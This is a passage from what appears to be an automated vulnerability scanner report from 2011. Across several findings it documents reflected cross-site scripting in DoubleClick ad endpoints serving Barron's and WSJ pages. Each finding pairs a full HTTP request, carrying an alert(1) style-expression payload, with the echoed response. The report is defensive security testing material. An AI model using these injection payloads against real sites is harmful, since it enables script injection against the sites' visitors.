Cache-Control: private, x-gzip-ok=""
Content-Length: 535

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/r;231251608;0-0;0;13405531;28940-280/61;38881709/38899466/1;;~okv=;!category=;;mc=0;tile=2;sz=280x61;6272f"style="x:expression(alert(1))"8a464770ae9;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWAA_OOTB9">
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/barrons.com/public_front [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/public_front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc865"style%3d"x%3aexpression(alert(1))"4bae22cf300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc865"style="x:expression(alert(1))"4bae22cf300 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/public_front;!category=;;mc=0;tile=2;sz=280x61;ord=2194219421942194;&dc865"style%3d"x%3aexpression(alert(1))"4bae22cf300=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 538

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/r;231251608;0-0;0;13405531;28940-280/61;38881709/38899466/1;;~okv=;!category=;;mc=0;tile=2;sz=280x61;&dc865"style="x:expression(alert(1))"4bae22cf300=1;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWAA_OOTB9">
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/sponsor_pickspans

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e79e"style%3d"x%3aexpression(alert(1))"93db2689eb3 was submitted in the !category parameter. This input was echoed as 2e79e"style="x:expression(alert(1))"93db2689eb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/sponsor_pickspans;!category=;;mc=0;tile=4;sz=140x31;ord=2194219421942194;2e79e"style%3d"x%3aexpression(alert(1))"93db2689eb3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 598

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;237099366;0-0;0;45555479;1932-140/31;40930725/40948512/1;;~okv=;!category=;;mc=0;tile=4;sz=140x31;2e79e"style="x:expression(alert(1))"93db2689eb3;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;237018358;60534698;r?http://www.wellsfargoadvisors.com?cid=OB110032231">
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/sponsor_pickspans

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5892a"style%3d"x%3aexpression(alert(1))"347383c07ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5892a"style="x:expression(alert(1))"347383c07ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/sponsor_pickspans;!category=;;mc=0;tile=4;sz=140x31;ord=2194219421942194;&5892a"style%3d"x%3aexpression(alert(1))"347383c07ec=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 601

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;237099366;0-0;0;45555479;1932-140/31;40930725/40948512/1;;~okv=;!category=;;mc=0;tile=4;sz=140x31;&5892a"style="x:expression(alert(1))"347383c07ec=1;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;237018358;60534698;r?http://www.wellsfargoadvisors.com?cid=OB110032231">
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/interactive.wsj.com/business_econ_front [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/business_econ_front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c68"style%3d"x%3aexpression(alert(1))"2faf44bbda4 was submitted in the !category parameter. This input was echoed as f2c68"style="x:expression(alert(1))"2faf44bbda4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/business_econ_front;!category=;;mc=b2pfreezone;tile=2;sz=377x140;ord=5370537053705370;f2c68"style%3d"x%3aexpression(alert(1))"2faf44bbda4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-economy.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:12:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 499

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/t;241062548;0-0;0;29217796;29332-377/140;42095072/42112859/1;;~okv=;!category=;;mc=b2pfreezone;tile=2;sz=377x140;f2c68"style="x:expression(alert(1))"2faf44bbda4;~aopt=2/1/ff/1;~sscs=%3fhttp://www.smartmoney.com">
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be652"style%3d"x%3aexpression(alert(1))"dfb7c8c44e4 was submitted in the !category parameter. This input was echoed as be652"style="x:expression(alert(1))"dfb7c8c44e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_front;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;ord=8089808980898089;be652"style%3d"x%3aexpression(alert(1))"dfb7c8c44e4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html?mod=WSJ_hp_LEFTTopStories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 561

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;232232404;0-0;11;29218002;28583-571/18;39182112/39199899/1;;~okv=;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;be652"style="x:expression(alert(1))"dfb7c8c44e4;~aopt=2/1/ff/1;~sscs=%3fhttps://order.wsj.com/sub/xdef/101/6BCWAE_OOT20">
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f33"%20style%3dx%3aexpression(alert(1))%208546d2741e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98f33" style=x:expression(alert(1)) 8546d2741e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_front;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;ord=8089808980898089;&98f33"%20style%3dx%3aexpression(alert(1))%208546d2741e6=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html?mod=WSJ_hp_LEFTTopStories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:10:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 564

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;232232404;0-0;11;29218002;28583-571/18;39182112/39199899/1;;~okv=;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;&98f33" style=x:expression(alert(1)) 8546d2741e6=1;~aopt=2/1/ff/1;~sscs=%3fhttps://order.wsj.com/sub/xdef/101/6BCWAE_OOT20">
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_taxreportstory

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f99f7"style%3d"x%3aexpression(alert(1))"48997269cdb was submitted in the !category parameter. This input was echoed as f99f7"style="x:expression(alert(1))"48997269cdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_taxreportstory;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;ord=8961896189618961;f99f7"style%3d"x%3aexpression(alert(1))"48997269cdb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html?mod=WSJ_newsreel_personalFinance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 11:37:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 599

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;223842858;0-0;2;15067118;33675-377/135;41133343/41151130/1;;~okv=;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;f99f7"style="x:expression(alert(1))"48997269cdb;~aopt=2/1/ff/1;~sscs=%3fhttp://itunes.apple.com/app/the-wall-street-journal/id364387007?mt=8">
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_taxreportstory

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1befe"style%3d"x%3aexpression(alert(1))"3c3863dbd13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1befe"style="x:expression(alert(1))"3c3863dbd13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_taxreportstory;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;ord=8961896189618961;&1befe"style%3d"x%3aexpression(alert(1))"3c3863dbd13=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html?mod=WSJ_newsreel_personalFinance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 11:37:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 602

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;223842858;0-0;2;15067118;33675-377/135;41133343/41151130/1;;~okv=;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;&1befe"style="x:expression(alert(1))"3c3863dbd13=1;~aopt=2/1/ff/1;~sscs=%3fhttp://itunes.apple.com/app/the-wall-street-journal/id364387007?mt=8">
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62da"style%3d"x%3aexpression(alert(1))"2236a8fae01 was submitted in the !category parameter. This input was echoed as e62da"style="x:expression(alert(1))"2236a8fae01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;biz=1053;;s=8_10001;mc=b2pfreezone;tile=2;sz=230x70;ord=3954395439543954;e62da"style%3d"x%3aexpression(alert(1))"2236a8fae01 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748703730804576313682030967852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:38:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 551

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/a;215945709;0-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;biz=1053;;s=8_10001;mc=b2pfreezone;tile=2;sz=230x70;e62da"style="x:expression(alert(1))"2236a8fae01;~aopt=6/1/ff/1;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d672d"style%3d"x%3aexpression(alert(1))"37335724abd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d672d"style="x:expression(alert(1))"37335724abd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=%5E%5ElA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;ord=1066106610661066;&d672d"style%3d"x%3aexpression(alert(1))"37335724abd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748703730804576313682030967852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:39:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 459

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;44306;0-0;0;31680223;31596-2/94;0/0/0;u=^^lA;~okv=;u=^^lA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;&d672d"style="x:expression(alert(1))"37335724abd=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718d4"style%3d"x%3aexpression(alert(1))"8d3f641a6d3 was submitted in the u parameter. This input was echoed as 718d4"style="x:expression(alert(1))"8d3f641a6d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=%5E%5ElA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;ord=1066106610661066;718d4"style%3d"x%3aexpression(alert(1))"8d3f641a6d3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748703730804576313682030967852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:38:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 456

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;44306;0-0;0;31680223;31596-2/94;0/0/0;u=^^lA;~okv=;u=^^lA;!category=;biz=1053;;s=8_10001;mc=b2pfreezone;tile=1;sz=2x94;718d4"style="x:expression(alert(1))"8d3f641a6d3;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [!category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/pf_weekendinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfd2"style%3d"x%3aexpression(alert(1))"5a8be0492cb was submitted in the !category parameter. This input was echoed as 2cfd2"style="x:expression(alert(1))"5a8be0492cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/pf_weekendinvestor;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;ord=6291629162916291;2cfd2"style%3d"x%3aexpression(alert(1))"5a8be0492cb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:37:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 572

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/y;218880928;0-0;1;49299998;28945-571/208;36054130/36072016/1;;~okv=;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;2cfd2"style="x:expression(alert(1))"5a8be0492cb;~aopt=2/1/ff/1;~sscs=%3fhttp://commerce.wsj.com/auth/login?roles=FREEREG-BASE&amp;reg-track-code=ss3_0310">
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/interactive.wsj.com/pf_weekendinvestor [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/pf_weekendinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6da8"style%3d"x%3aexpression(alert(1))"491de8a7ea7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6da8"style="x:expression(alert(1))"491de8a7ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/pf_weekendinvestor;!category=;page=article;;mc=b2pfreezone_super;tile=2;sz=571x208;ord=6291629162916291;&d6da8"style%3d"x%3aexpression(alert(1))"491de8a7ea7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703730804576313682030967852.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
